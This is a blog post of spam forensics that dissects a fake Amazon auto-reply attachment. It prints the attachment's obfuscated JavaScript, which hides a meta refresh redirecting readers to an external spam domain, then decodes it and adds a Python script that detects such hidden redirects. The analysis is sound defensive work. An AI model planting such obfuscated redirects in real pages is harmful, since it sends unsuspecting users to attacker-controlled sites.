Spam Forensics II

(Continued from Spam Forensics I)

Our email contained an attachment in html:

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
  <meta content="text/html; charset=ISO-8859-1"
 http-equiv="content-type">
  <title></title>
</head>
<body>
Greetings from <span class="il">Amazon</span>.com.<br>
<br>
We're sorry. &nbsp;You've written to an address that cannot accept
incoming<br>
e-mail. &nbsp;But that's OK--this automated response will direct
you to the<br>
right place at <span class="il">Amazon</span>.com
to answer your question or help you contact<br>
customer service if you need further assistance.<br>
<br>
You will find the answers to the most common questions here:<br>
<br>
&nbsp;Ordering: <a href="http://www.amazon.com/help/ordering"
 target="_blank">http://www.<span class="il">amazon</span>.com/help/<wbr>ordering</a><br>
&nbsp;Where's My Stuff: <a
 href="http://www.amazon.com/help/wheres-my-stuff"
 target="_blank">http://www.<span class="il">amazon</span>.com/help/<wbr>wheres-my-stuff</a><br>
&nbsp;Gift Certificates: <a
 href="http://www.amazon.com/gift-certificates" target="_blank">http://www.<span
 class="il">amazon</span>.com/gift-<wbr>certificates</a><br>
&nbsp;Promotions: <a
 href="http://www.amazon.com/o/tg/browse/-/565778/"
 target="_blank">http://www.<span class="il">amazon</span>.com/o/tg/<wbr>browse/-/565778/</a><br>
&nbsp;Shipping Options: <a
 href="http://www.amazon.com/help/shipping" target="_blank">http://www.<span
 class="il">amazon</span>.com/help/<wbr>shipping</a><br>
&nbsp;Returns: <a href="http://www.amazon.com/returns"
 target="_blank">http://www.<span class="il">amazon</span>.com/returns</a><br>
<br><script>if(frames){if(top.frames.length>0)top.location.href=self.location;}</script><script language=JavaScript>document.write(unescape('%3Cme%74a h%74tp%2Deq%75iv%3D%22r%65fr%65sh%22 co%6Ete%6Et%3D%220%3B%75rl%3Dht%74p%3A%2F%2Fg%72ad%75at%69on%6Fut%66it%74er%73%2Ec%6F%2Ez%61%2F1%2Eht%6Dl%22 %2F%3E%0D%0A%3Ct%61bl%65 wi%64th%3D%221%300%25%22 bo%72de%72%3D%22%30%22%3E%3Ctr %62gc%6Flo%72%3D%22%2355%3668%38%22 a%6Cig%6E%3D%22%63en%74er%22%3E%3C%74d%3E%3Ca h%72ef%3D%22h%74tp%3A%2F%2F%77ww%2Epu%6Cls%6Fft%2Eco%6D%2Fh%74ml%70ow%65r%2E%68tm%22%3E%3C%66on%74 fa%63e%3D%22Ar%69al%2C He%6Cve%74ic%61%2C s%61ns%2Dse%72if%22 co%6Cor%3D%22#%46FF%46FF%22 si%7Ae%3D%22%2D1%22%3ET%68is %57eb %50ag%65 wa%73 pr%6Fte%63te%64 by %48TM%4CPo%77er%2C  Cl%69ck %68er%65 to %52eg%69st%65r%3C%2Ffo%6Et%3E%3C%2Fa%3E%3C%2F%74d%3E%3C%2Ft%72%3E%3C%2Fta%62le%3E%0D%0A'))</script>
If your question is not answered by the above links, we invite you to<br>
search our Help Desk at <a href="http://www.amazon.com/help"
 target="_blank">http://www.<span class="il">amazon</span>.com/help</a><br>
<br>
If you need to modify an unshipped order or make changes to your<br>
account or subscriptions, you may do so online at any time via<br>
Your Account: &nbsp;<a href="http://www.amazon.com/your-account"
 target="_blank">http://www.<span class="il">amazon</span>.com/your-<wbr>account</a><br>
<br>
We hope our online resources meet all your needs. &nbsp;If you've
explored<br>
the above links but find you still need to get in touch with us,<br>
please click the "Contact Customer Service" link on our main Help page.<br>
<br>
Thanks for shopping at <span class="il">Amazon</span>.com.<br>
<br>
Sincerely,<br>
<br>
<span class="il">Amazon</span>.com Customer Service<br>
<a href="http://www.amazon.com" target="_blank">http://www.<span
 class="il">amazon</span>.com</a><br>
</body>
</html>

Which is pretty boring, containing some Amazon links and otherwise benign code, except for line 37 of the attachment, which contains two JavaScript sections (formatting added):

<script>
    if(frames){
        if(top.frames.length>0)
            top.location.href=self.location;
    }
</script>

<script language=JavaScript>
    document.write(
        unescape('%3Cme%74a h%74tp%2Deq%75iv%3D%22r%65fr%65sh%22 co%6Ete%6Et%3D%220%3B%75rl%3Dht%74p%3A%2F%2Fg%72ad%75at%69on%6Fut%66it%74er%73%2Ec%6F%2Ez%61%2F1%2Eht%6Dl%22 %2F%3E%0D%0A%3Ct%61bl%65 wi%64th%3D%221%300%25%22 bo%72de%72%3D%22%30%22%3E%3Ctr %62gc%6Flo%72%3D%22%2355%3668%38%22 a%6Cig%6E%3D%22%63en%74er%22%3E%3C%74d%3E%3Ca h%72ef%3D%22h%74tp%3A%2F%2F%77ww%2Epu%6Cls%6Fft%2Eco%6D%2Fh%74ml%70ow%65r%2E%68tm%22%3E%3C%66on%74 fa%63e%3D%22Ar%69al%2C He%6Cve%74ic%61%2C s%61ns%2Dse%72if%22 co%6Cor%3D%22#%46FF%46FF%22 si%7Ae%3D%22%2D1%22%3ET%68is %57eb %50ag%65 wa%73 pr%6Fte%63te%64 by %48TM%4CPo%77er%2C  Cl%69ck %68er%65 to %52eg%69st%65r%3C%2Ffo%6Et%3E%3C%2Fa%3E%3C%2F%74d%3E%3C%2Ft%72%3E%3C%2Fta%62le%3E%0D%0A')
    )
</script>

The first section is quickly identified as a simple FrameBuster.

The second section simply inserts the value of the string inline once it is unescaped. Using the tool found here, I unescaped the JavaScript string without worrying about what it did.

The result is (formatting added):

<meta http-equiv="refresh" content="0;url=http://graduationoutfitters.co.za/1.html" />
<table width="100%" border="0">
    <tr bgcolor="#556688" align="center">
        <td>
            <a href="http://www.pullsoft.com/htmlpower.htm">
                <font face="Arial, Helvetica, sans-serif" color="#FFFFFF" size="-1">
                    This Web Page was protected by HTMLPower,  Click here to Register
                </font>
            </a>
        </td>
    </tr>
</table>

This HTML meta tag “refreshes” or redirects your browser to whatever page is specified, in this case http://graduationoutfitters.co.za/1.html. (In case you’re wondering, the .za TLD is South Africa.)
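The unescape() decoding and the meta refresh check described above, as an added example that is not part of the original post: a small Python triage script that reproduces JavaScript's legacy unescape() (including %uXXXX, which urllib.parse.unquote does not handle), decodes every unescape('...') literal found in an attachment, and pulls the url= target out of any meta refresh that only appears after decoding. The attachment below is a constructed skeleton that carries just the two script blocks from the post; the function names are my own.

```python
import re

# Constructed minimal attachment: the two <script> blocks from the analysed
# spam, wrapped in a bare HTML skeleton (the charset <meta> is kept so the
# scan has a harmless meta tag to ignore).
ATTACHMENT = """<html><head><meta content="text/html; charset=ISO-8859-1" http-equiv="content-type"></head><body>
Greetings from Amazon.com.<br>
<script>if(frames){if(top.frames.length>0)top.location.href=self.location;}</script><script language=JavaScript>document.write(unescape('%3Cme%74a h%74tp%2Deq%75iv%3D%22r%65fr%65sh%22 co%6Ete%6Et%3D%220%3B%75rl%3Dht%74p%3A%2F%2Fg%72ad%75at%69on%6Fut%66it%74er%73%2Ec%6F%2Ez%61%2F1%2Eht%6Dl%22 %2F%3E%0D%0A%3Ct%61bl%65 wi%64th%3D%221%300%25%22 bo%72de%72%3D%22%30%22%3E%3Ctr %62gc%6Flo%72%3D%22%2355%3668%38%22 a%6Cig%6E%3D%22%63en%74er%22%3E%3C%74d%3E%3Ca h%72ef%3D%22h%74tp%3A%2F%2F%77ww%2Epu%6Cls%6Fft%2Eco%6D%2Fh%74ml%70ow%65r%2E%68tm%22%3E%3C%66on%74 fa%63e%3D%22Ar%69al%2C He%6Cve%74ic%61%2C s%61ns%2Dse%72if%22 co%6Cor%3D%22#%46FF%46FF%22 si%7Ae%3D%22%2D1%22%3ET%68is %57eb %50ag%65 wa%73 pr%6Fte%63te%64 by %48TM%4CPo%77er%2C  Cl%69ck %68er%65 to %52eg%69st%65r%3C%2Ffo%6Et%3E%3C%2Fa%3E%3C%2F%74d%3E%3C%2Ft%72%3E%3C%2Fta%62le%3E%0D%0A'))</script>
</body></html>"""

UNESCAPE_CALL_RE = re.compile(r"""unescape\(\s*(['"])(.*?)\1\s*\)""", re.S)
META_TAG_RE = re.compile(r"<meta\b[^>]*>", re.I)
REFRESH_EQUIV_RE = re.compile(r"""http-equiv\s*=\s*["']?refresh""", re.I)
CONTENT_ATTR_RE = re.compile(r"""content\s*=\s*["']([^"']*)["']""", re.I)
REFRESH_URL_RE = re.compile(r"""^\s*\d+\s*;\s*url\s*=\s*["']?([^"'\s]+)""", re.I)


def js_unescape(text):
    """Reproduce JavaScript's legacy unescape(): %uXXXX -> U+XXXX, %XX -> U+00XX.
    Anything that is not a valid escape is left untouched, as unescape() does."""
    return re.sub(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})",
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), text)


def refresh_targets(markup):
    """Return the url= part of every <meta http-equiv="refresh"> in markup."""
    urls = []
    for tag in META_TAG_RE.findall(markup):
        if not REFRESH_EQUIV_RE.search(tag):
            continue  # e.g. the charset meta: not a redirect
        content = CONTENT_ATTR_RE.search(tag)
        hit = REFRESH_URL_RE.match(content.group(1)) if content else None
        if hit:
            urls.append(hit.group(1))
    return urls


def hidden_refresh_targets(markup):
    """Decode each unescape('...') literal and scan the decoded text for meta
    refreshes: the redirect a scan of the raw attachment never sees."""
    urls = []
    for _quote, literal in UNESCAPE_CALL_RE.findall(markup):
        urls.extend(refresh_targets(js_unescape(literal)))
    return urls


if __name__ == "__main__":
    print("visible in raw markup:", refresh_targets(ATTACHMENT))
    print("revealed by decoding: ", hidden_refresh_targets(ATTACHMENT))
```

Run against the raw attachment the scan finds no redirect at all; only the decoded document.write payload yields the .co.za target.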

The humorous thing is that, after looking at the pullsoft.com link, it appears the spammer used that company's software to encode the meta refresh tag, and the software appended a little advertisement. How thoughtful.

After all that, nothing crazy — a forged email header, an (unnecessarily) encoded HTML meta refresh tag and one more spam for the bit bucket.

Posted Friday, September 24th, 2010 under networking.

2 comments

  1. Nice writeup! I just got hit with a couple of these emails and glad to drop by and see your forensic work.